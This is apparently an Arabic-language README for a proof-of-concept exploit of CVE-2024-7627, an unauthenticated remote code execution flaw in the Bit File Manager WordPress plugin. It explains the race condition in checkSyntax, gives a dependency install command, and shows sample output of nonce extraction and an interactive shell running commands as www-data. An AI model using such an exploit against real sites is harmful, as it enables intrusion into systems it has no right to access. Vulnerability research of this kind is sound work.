
إثبات مفهوم لاستغلال CVE-2024-7627، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد بدون مصادقة في إضافة Bit File Manager الخاصة بووردبريس. يقوم بأتمتة استخراج nonce، واستغلال حالة السباق، ويوفر قشرة تفاعلية عكسية.
يحتوي هذا المستودع على استغلال (PoC) لإثبات المفهوم لثغرة CVE-2024-7627، وهي ثغرة حرجة من نوع تنفيذ تعليمات برمجية عن بُعد غير مصادق عليه (Unauthenticated RCE) في إضافة Bit File Manager لووردبريس (الإصدارات 6.0 – 6.5.5).
عند تمكين ميزة Guest User Read، تكشف الإضافة عن حالة سباق داخل دالة checkSyntax.
تكتب هذه الدالة ملف PHP مؤقتًا داخل /wp-content/uploads/ قبل التحقق، مما يسمح للمهاجمين بطلب الملف وتنفيذ أوامر نظام عشوائية.
requests, aiohttp, asyncio, beautifulsoup4ثبّت التبعيات:
pip install requests aiohttp beautifulsoup4
[*] Getting a valid AJAX nonce...
[+] Found the valid AJAX nonce: 65a1d91c63
[*] Getting a random file hash...
[+] Starting interactive shell. Type 'exit' to quit.
lab-shell> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
lab-shell> uname -a
Linux victim-wp 5.15.0-78-generic #85-Ubuntu SMP x86_64 GNU/Linux
lab-shell> whoami
www-data